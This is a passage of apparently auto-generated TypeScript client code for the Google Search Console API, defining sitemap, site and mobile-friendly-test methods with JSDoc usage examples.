* scopes: ['https://www.googleapis.com/auth/webmasters'],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await searchconsole.sitemaps.delete({
* // The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
* feedpath: 'placeholder-value',
* // The site's URL, including protocol. For example: `http://www.example.com/`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
delete(
params: Params$Resource$Sitemaps$Delete,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
delete(
params?: Params$Resource$Sitemaps$Delete,
options?: MethodOptions
): GaxiosPromise<void>;
delete(
params: Params$Resource$Sitemaps$Delete,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
delete(
params: Params$Resource$Sitemaps$Delete,
options: MethodOptions | BodyResponseCallback<void>,
callback: BodyResponseCallback<void>
): void;
delete(
params: Params$Resource$Sitemaps$Delete,
callback: BodyResponseCallback<void>
): void;
delete(callback: BodyResponseCallback<void>): void;
delete(
paramsOrCallback?:
| Params$Resource$Sitemaps$Delete
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
callback?: BodyResponseCallback<void> | BodyResponseCallback<Readable>
): void | GaxiosPromise<void> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sitemaps$Delete;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sitemaps$Delete;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (
rootUrl + '/webmasters/v3/sites/{siteUrl}/sitemaps/{feedpath}'
).replace(/([^:]\/)\/+/g, '$1'),
method: 'DELETE',
},
options
),
params,
requiredParams: ['siteUrl', 'feedpath'],
pathParams: ['feedpath', 'siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<void>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<void>(parameters);
}
}
/**
* Retrieves information about a specific sitemap.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Log in to gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [
* 'https://www.googleapis.com/auth/webmasters',
* 'https://www.googleapis.com/auth/webmasters.readonly',
* ],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await searchconsole.sitemaps.get({
* // The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
* feedpath: 'placeholder-value',
* // The site's URL, including protocol. For example: `http://www.example.com/`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
*
* // Example response
* // {
* // "contents": [],
* // "errors": "my_errors",
* // "isPending": false,
* // "isSitemapsIndex": false,
* // "lastDownloaded": "my_lastDownloaded",
* // "lastSubmitted": "my_lastSubmitted",
* // "path": "my_path",
* // "type": "my_type",
* // "warnings": "my_warnings"
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
get(
params: Params$Resource$Sitemaps$Get,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
get(
params?: Params$Resource$Sitemaps$Get,
options?: MethodOptions
): GaxiosPromise<Schema$WmxSitemap>;
get(
params: Params$Resource$Sitemaps$Get,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
get(
params: Params$Resource$Sitemaps$Get,
options: MethodOptions | BodyResponseCallback<Schema$WmxSitemap>,
callback: BodyResponseCallback<Schema$WmxSitemap>
): void;
get(
params: Params$Resource$Sitemaps$Get,
callback: BodyResponseCallback<Schema$WmxSitemap>
): void;
get(callback: BodyResponseCallback<Schema$WmxSitemap>): void;
get(
paramsOrCallback?:
| Params$Resource$Sitemaps$Get
| BodyResponseCallback<Schema$WmxSitemap>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$WmxSitemap>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$WmxSitemap>
| BodyResponseCallback<Readable>
): void | GaxiosPromise<Schema$WmxSitemap> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sitemaps$Get;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sitemaps$Get;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (
rootUrl + '/webmasters/v3/sites/{siteUrl}/sitemaps/{feedpath}'
).replace(/([^:]\/)\/+/g, '$1'),
method: 'GET',
},
options
),
params,
requiredParams: ['siteUrl', 'feedpath'],
pathParams: ['feedpath', 'siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$WmxSitemap>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$WmxSitemap>(parameters);
}
}
/**
* Lists the [sitemaps-entries](/webmaster-tools/v3/sitemaps) submitted for this site, or included in the sitemap index file (if `sitemapIndex` is specified in the request).
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
     * // - Log in to gcloud by running:
     * //   `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [
* 'https://www.googleapis.com/auth/webmasters',
* 'https://www.googleapis.com/auth/webmasters.readonly',
* ],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
     *   const res = await searchconsole.sitemaps.list({
* // A URL of a site's sitemap index. For example: `http://www.example.com/sitemapindex.xml`.
* sitemapIndex: 'placeholder-value',
* // The site's URL, including protocol. For example: `http://www.example.com/`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
*
* // Example response
* // {
* // "sitemap": []
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
list(
params: Params$Resource$Sitemaps$List,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
list(
params?: Params$Resource$Sitemaps$List,
options?: MethodOptions
): GaxiosPromise<Schema$SitemapsListResponse>;
list(
params: Params$Resource$Sitemaps$List,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
list(
params: Params$Resource$Sitemaps$List,
options:
| MethodOptions
| BodyResponseCallback<Schema$SitemapsListResponse>,
callback: BodyResponseCallback<Schema$SitemapsListResponse>
): void;
list(
params: Params$Resource$Sitemaps$List,
callback: BodyResponseCallback<Schema$SitemapsListResponse>
): void;
list(callback: BodyResponseCallback<Schema$SitemapsListResponse>): void;
list(
paramsOrCallback?:
| Params$Resource$Sitemaps$List
| BodyResponseCallback<Schema$SitemapsListResponse>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$SitemapsListResponse>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$SitemapsListResponse>
| BodyResponseCallback<Readable>
):
| void
| GaxiosPromise<Schema$SitemapsListResponse>
| GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sitemaps$List;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sitemaps$List;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (rootUrl + '/webmasters/v3/sites/{siteUrl}/sitemaps').replace(
/([^:]\/)\/+/g,
'$1'
),
method: 'GET',
},
options
),
params,
requiredParams: ['siteUrl'],
pathParams: ['siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$SitemapsListResponse>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$SitemapsListResponse>(parameters);
}
}
/**
* Submits a sitemap for a site.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
     * // - Log in to gcloud by running:
     * //   `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: ['https://www.googleapis.com/auth/webmasters'],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
     *   const res = await searchconsole.sitemaps.submit({
* // The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
* feedpath: 'placeholder-value',
* // The site's URL, including protocol. For example: `http://www.example.com/`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
submit(
params: Params$Resource$Sitemaps$Submit,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
submit(
params?: Params$Resource$Sitemaps$Submit,
options?: MethodOptions
): GaxiosPromise<void>;
submit(
params: Params$Resource$Sitemaps$Submit,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
submit(
params: Params$Resource$Sitemaps$Submit,
options: MethodOptions | BodyResponseCallback<void>,
callback: BodyResponseCallback<void>
): void;
submit(
      params: Params$Resource$Sitemaps$Submit,
      callback: BodyResponseCallback<void>
    ): void;
    submit(callback: BodyResponseCallback<void>): void;
submit(
paramsOrCallback?:
| Params$Resource$Sitemaps$Submit
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
callback?: BodyResponseCallback<void> | BodyResponseCallback<Readable>
): void | GaxiosPromise<void> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sitemaps$Submit;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sitemaps$Submit;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (
rootUrl + '/webmasters/v3/sites/{siteUrl}/sitemaps/{feedpath}'
).replace(/([^:]\/)\/+/g, '$1'),
method: 'PUT',
},
options
),
params,
requiredParams: ['siteUrl', 'feedpath'],
pathParams: ['feedpath', 'siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<void>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<void>(parameters);
}
}
}
export interface Params$Resource$Sitemaps$Delete extends StandardParameters {
/**
* The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
*/
feedpath?: string;
/**
* The site's URL, including protocol. For example: `http://www.example.com/`.
*/
siteUrl?: string;
}
export interface Params$Resource$Sitemaps$Get extends StandardParameters {
/**
* The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
*/
feedpath?: string;
/**
* The site's URL, including protocol. For example: `http://www.example.com/`.
*/
siteUrl?: string;
}
export interface Params$Resource$Sitemaps$List extends StandardParameters {
/**
* A URL of a site's sitemap index. For example: `http://www.example.com/sitemapindex.xml`.
*/
sitemapIndex?: string;
/**
* The site's URL, including protocol. For example: `http://www.example.com/`.
*/
siteUrl?: string;
}
export interface Params$Resource$Sitemaps$Submit extends StandardParameters {
/**
* The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
*/
feedpath?: string;
/**
* The site's URL, including protocol. For example: `http://www.example.com/`.
*/
siteUrl?: string;
}
export class Resource$Sites {
context: APIRequestContext;
constructor(context: APIRequestContext) {
this.context = context;
}
/**
* Adds a site to the set of the user's sites in Search Console.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
     * // - Log in to gcloud by running:
     * //   `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: ['https://www.googleapis.com/auth/webmasters'],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
     *   const res = await searchconsole.sites.add({
* // The URL of the site to add.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
add(
params: Params$Resource$Sites$Add,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
add(
params?: Params$Resource$Sites$Add,
options?: MethodOptions
): GaxiosPromise<void>;
add(
params: Params$Resource$Sites$Add,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
add(
params: Params$Resource$Sites$Add,
options: MethodOptions | BodyResponseCallback<void>,
callback: BodyResponseCallback<void>
): void;
add(
params: Params$Resource$Sites$Add,
callback: BodyResponseCallback<void>
): void;
add(callback: BodyResponseCallback<void>): void;
add(
paramsOrCallback?:
| Params$Resource$Sites$Add
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
callback?: BodyResponseCallback<void> | BodyResponseCallback<Readable>
): void | GaxiosPromise<void> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sites$Add;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sites$Add;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (rootUrl + '/webmasters/v3/sites/{siteUrl}').replace(
/([^:]\/)\/+/g,
'$1'
),
method: 'PUT',
},
options
),
params,
requiredParams: ['siteUrl'],
pathParams: ['siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<void>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<void>(parameters);
}
}
/**
* Removes a site from the set of the user's Search Console sites.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
     * // - Log in to gcloud by running:
     * //   `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: ['https://www.googleapis.com/auth/webmasters'],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
     *   const res = await searchconsole.sites.delete({
* // The URI of the property as defined in Search Console. **Examples:** `http://www.example.com/` or `sc-domain:example.com`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
delete(
params: Params$Resource$Sites$Delete,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
delete(
params?: Params$Resource$Sites$Delete,
options?: MethodOptions
): GaxiosPromise<void>;
delete(
params: Params$Resource$Sites$Delete,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
delete(
params: Params$Resource$Sites$Delete,
options: MethodOptions | BodyResponseCallback<void>,
callback: BodyResponseCallback<void>
): void;
delete(
params: Params$Resource$Sites$Delete,
callback: BodyResponseCallback<void>
): void;
delete(callback: BodyResponseCallback<void>): void;
delete(
paramsOrCallback?:
| Params$Resource$Sites$Delete
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
callback?: BodyResponseCallback<void> | BodyResponseCallback<Readable>
): void | GaxiosPromise<void> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sites$Delete;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sites$Delete;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (rootUrl + '/webmasters/v3/sites/{siteUrl}').replace(
/([^:]\/)\/+/g,
'$1'
),
method: 'DELETE',
},
options
),
params,
requiredParams: ['siteUrl'],
pathParams: ['siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<void>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<void>(parameters);
}
}
/**
     * Retrieves information about a specific site.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
     * // - Log in to gcloud by running:
     * //   `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [
* 'https://www.googleapis.com/auth/webmasters',
* 'https://www.googleapis.com/auth/webmasters.readonly',
* ],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
     *   const res = await searchconsole.sites.get({
* // The URI of the property as defined in Search Console. **Examples:** `http://www.example.com/` or `sc-domain:example.com`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
*
* // Example response
* // {
* // "permissionLevel": "my_permissionLevel",
* // "siteUrl": "my_siteUrl"
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
get(
params: Params$Resource$Sites$Get,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
get(
params?: Params$Resource$Sites$Get,
options?: MethodOptions
): GaxiosPromise<Schema$WmxSite>;
get(
params: Params$Resource$Sites$Get,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
get(
params: Params$Resource$Sites$Get,
options: MethodOptions | BodyResponseCallback<Schema$WmxSite>,
callback: BodyResponseCallback<Schema$WmxSite>
): void;
get(
params: Params$Resource$Sites$Get,
callback: BodyResponseCallback<Schema$WmxSite>
): void;
get(callback: BodyResponseCallback<Schema$WmxSite>): void;
get(
paramsOrCallback?:
| Params$Resource$Sites$Get
| BodyResponseCallback<Schema$WmxSite>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$WmxSite>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$WmxSite>
| BodyResponseCallback<Readable>
): void | GaxiosPromise<Schema$WmxSite> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sites$Get;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sites$Get;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (rootUrl + '/webmasters/v3/sites/{siteUrl}').replace(
/([^:]\/)\/+/g,
'$1'
),
method: 'GET',
},
options
),
params,
requiredParams: ['siteUrl'],
pathParams: ['siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$WmxSite>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$WmxSite>(parameters);
}
}
/**
* Lists the user's Search Console sites.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
     * // - Log in to gcloud by running:
     * //   `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [
* 'https://www.googleapis.com/auth/webmasters',
* 'https://www.googleapis.com/auth/webmasters.readonly',
* ],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
     *   const res = await searchconsole.sites.list({});
* console.log(res.data);
*
* // Example response
* // {
* // "siteEntry": []
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
list(
params: Params$Resource$Sites$List,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
list(
params?: Params$Resource$Sites$List,
options?: MethodOptions
): GaxiosPromise<Schema$SitesListResponse>;
list(
params: Params$Resource$Sites$List,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
list(
params: Params$Resource$Sites$List,
options: MethodOptions | BodyResponseCallback<Schema$SitesListResponse>,
callback: BodyResponseCallback<Schema$SitesListResponse>
): void;
list(
params: Params$Resource$Sites$List,
callback: BodyResponseCallback<Schema$SitesListResponse>
): void;
list(callback: BodyResponseCallback<Schema$SitesListResponse>): void;
list(
paramsOrCallback?:
| Params$Resource$Sites$List
| BodyResponseCallback<Schema$SitesListResponse>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$SitesListResponse>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$SitesListResponse>
| BodyResponseCallback<Readable>
):
| void
| GaxiosPromise<Schema$SitesListResponse>
| GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sites$List;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sites$List;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (rootUrl + '/webmasters/v3/sites').replace(
/([^:]\/)\/+/g,
'$1'
),
method: 'GET',
},
options
),
params,
requiredParams: [],
pathParams: [],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$SitesListResponse>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$SitesListResponse>(parameters);
}
}
}
export interface Params$Resource$Sites$Add extends StandardParameters {
/**
* The URL of the site to add.
*/
siteUrl?: string;
}
export interface Params$Resource$Sites$Delete extends StandardParameters {
/**
* The URI of the property as defined in Search Console. **Examples:** `http://www.example.com/` or `sc-domain:example.com`.
*/
siteUrl?: string;
}
export interface Params$Resource$Sites$Get extends StandardParameters {
/**
* The URI of the property as defined in Search Console. **Examples:** `http://www.example.com/` or `sc-domain:example.com`.
*/
siteUrl?: string;
}
export interface Params$Resource$Sites$List extends StandardParameters {}
export class Resource$Urltestingtools {
context: APIRequestContext;
mobileFriendlyTest: Resource$Urltestingtools$Mobilefriendlytest;
constructor(context: APIRequestContext) {
this.context = context;
this.mobileFriendlyTest = new Resource$Urltestingtools$Mobilefriendlytest(
this.context
);
}
}
export class Resource$Urltestingtools$Mobilefriendlytest {
context: APIRequestContext;
constructor(context: APIRequestContext) {
this.context = context;
}
/**
* Runs Mobile-Friendly Test for a given URL.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
     * // - Log in to gcloud by running:
     * //   `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await searchconsole.urlTestingTools.mobileFriendlyTest.run({
* // Request body metadata
* requestBody: {
* // request body parameters
* // {
* // "requestScreenshot": false,
* // "url": "my_url"
* // }
* },
* });
* console.log(res.data);
*
* // Example response
* // {
* // "mobileFriendliness": "my_mobileFriendliness",
* // "mobileFriendlyIssues": [],
* // "resourceIssues": [],
* // "screenshot": {},
* // "testStatus": {}
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
run(
params: Params$Resource$Urltestingtools$Mobilefriendlytest$Run,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
run(
params?: Params$Resource$Urltestingtools$Mobilefriendlytest$Run,
options?: MethodOptions
): GaxiosPromise<Schema$RunMobileFriendlyTestResponse>;
run(
params: Params$Resource$Urltestingtools$Mobilefriendlytest$Run,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
run(
params: Params$Resource$Urltestingtools$Mobilefriendlytest$Run,
options:
| MethodOptions
| BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>,
callback: BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
): void;
run(
params: Params$Resource$Urltestingtools$Mobilefriendlytest$Run,
callback: BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
): void;
run(
callback: BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
): void;
run(
paramsOrCallback?:
| Params$Resource$Urltestingtools$Mobilefriendlytest$Run
| BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
| BodyResponseCallback<Readable>
):
| void
| GaxiosPromise<Schema$RunMobileFriendlyTestResponse>
| GaxiosPromise<Readable> {
let params = (paramsOrCallback ||
{}) as Params$Resource$Urltestingtools$Mobilefriendlytest$Run;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Urltestingtools$Mobilefriendlytest$Run;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (
rootUrl + '/v1/urlTestingTools/mobileFriendlyTest:run'
).replace(/([^:]\/)\/+/g, '$1'),
method: 'POST',
},
options
),
params,
requiredParams: [],
pathParams: [],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$RunMobileFriendlyTestResponse>(
parameters,
